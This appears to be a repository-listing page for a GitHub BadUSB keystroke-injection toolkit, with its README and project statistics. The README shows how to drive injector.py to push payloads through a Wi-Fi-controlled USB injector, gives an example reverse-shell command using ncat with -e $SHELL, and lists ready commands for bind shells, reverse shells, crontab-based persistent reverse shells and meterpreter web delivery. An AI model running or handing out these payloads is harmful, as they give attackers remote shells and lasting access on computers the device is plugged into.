https://github.com/byt3n33dl3/neonoirexec

Release Neo the Evil Ducky, A scripts into any Hardware or drive Devices.

https://github.com/byt3n33dl3/neonoirexec

Science Score: 13.0%

This score indicates how likely this project is to be science-related based on various indicators:

  • CITATION.cff file
  • codemeta.json file
    Found codemeta.json file
  • .zenodo.json file
  • DOI references
  • Academic publication links
  • Academic email domains
  • Institutional organization owner
  • JOSS paper metadata
  • Scientific vocabulary similarity
    Low similarity (5.9%) to scientific vocabulary

Keywords

bad-usb rubber-ducky scripts straightforward trust-attack
Last synced: 5 months ago · JSON representation

Repository

Release Neo the Evil Ducky, A scripts into any Hardware or drive Devices.

Basic Info
  • Host: GitHub
  • Owner: byt3n33dl3
  • License: lgpl-3.0
  • Language: C
  • Default Branch: main
  • Homepage:
  • Size: 21.4 MB
Statistics
  • Stars: 12
  • Watchers: 1
  • Forks: 1
  • Open Issues: 0
  • Releases: 1
Topics
bad-usb rubber-ducky scripts straightforward trust-attack
Created about 2 years ago · Last pushed over 1 year ago
Metadata Files
Readme License

README.md

Warning : Newest version of Neo Toolkit expect the Neo to have a firmware in the prefered language, alternatively you can force the french keyboard with the english firmware using the --force arguments. For more customization informations go to swisskyrepo.github.io .

Where to buy a Neo injector ? I got mine from Aliexpress

How to use the script

```c python3 injector.py -v --host 127.0.0.1 --port 4242 --payload payloads / windows.txt -h
usage: injector.py [-h] [-v] [--host [HOST]] [--port [PORT]] [--user [USER]] [--pass [PASS]] [--panel [PANEL]] [--payload [PAYLOAD]]

optional arguments: -h, --help show this help message and exit -v Verbosity of the output --host [HOST] Host reverse-shell --port [PORT] Port reverse-shell --user [USER] Wifi Panel username --pass [PASS] Wifi Panel password --panel [PANEL] Wifi Panel password --payload [PAYLOAD] Payload template ```

Targeting a Windows OS c python3 injector.py -v --host 127.0.0.1 --port 4242 --payload payloads/windows.txt

Send a simple reverse-shell payload `` $ python3 injector.py -v --host 127.0.0.1 --port 4444 ------------------------------------------------------------- Neo injector - You need to be connected to the Exploit AP ------------------------------------------------------------- __ ° <(o )___ ( ._> / ---' @pxcs

Enter a payload, eg: bash -c 'nohup ncat 127.0.0.1 4242 -e $SHELL &'

reverse Payload: Rem:Default Payload Press:130+195 CustomDelay:1000 Print: bash SHELL:14 CustomDelay:1000 Press:176

Sending payload to http://192.168.1.1/runlivepayload ```

Payloads and commands

| Commands | Description | | :------------- | :------------- | | bind | initiate a bind shell on results.port | | reverse | initiate a reverse shell on results.host and results.port | | crontab | set up a crontab reverse shell on results.host and results.port | | meterpreter | use exploit script / web delivery with a posh-payload | | send some text | send the specified text | | h | help | | q | quit |

You can change the options with SET option_name option_value ```c

set host 127.0.0.1 set port 4444 ```

Thanks to: - swisskyrepo - metasploit - pxcs

Owner

  • Name: Sulaiman
  • Login: byt3n33dl3
  • Kind: user
  • Location: Error 403: Not on earth

I N F R A X 8 6

GitHub Events

Total
  • Watch event: 1
Last Year
  • Watch event: 1

Issues and Pull Requests

Last synced: 10 months ago

All Time
  • Total issues: 1
  • Total pull requests: 5
  • Average time to close issues: less than a minute
  • Average time to close pull requests: 5 minutes
  • Total issue authors: 1
  • Total pull request authors: 1
  • Average comments per issue: 0.0
  • Average comments per pull request: 0.2
  • Merged pull requests: 5
  • Bot issues: 0
  • Bot pull requests: 0
Past Year
  • Issues: 0
  • Pull requests: 0
  • Average time to close issues: N/A
  • Average time to close pull requests: N/A
  • Issue authors: 0
  • Pull request authors: 0
  • Average comments per issue: 0
  • Average comments per pull request: 0
  • Merged pull requests: 0
  • Bot issues: 0
  • Bot pull requests: 0
Top Authors
Issue Authors
  • byt3n33dl3 (1)
Pull Request Authors
  • byt3n33dl3 (5)
Top Labels
Issue Labels
Pull Request Labels
documentation (2)

Dependencies

payloads/powershell/MSF.Powershell/MSF.Powershell.Sample/MSF.Powershell.Sample.csproj nuget
payloads/powershell/MSF.Powershell/MSF.Powershell.csproj nuget
payloads/powershell/MSF.Powershell/MSF.PowershellTester/MSF.PowershellTester.csproj nuget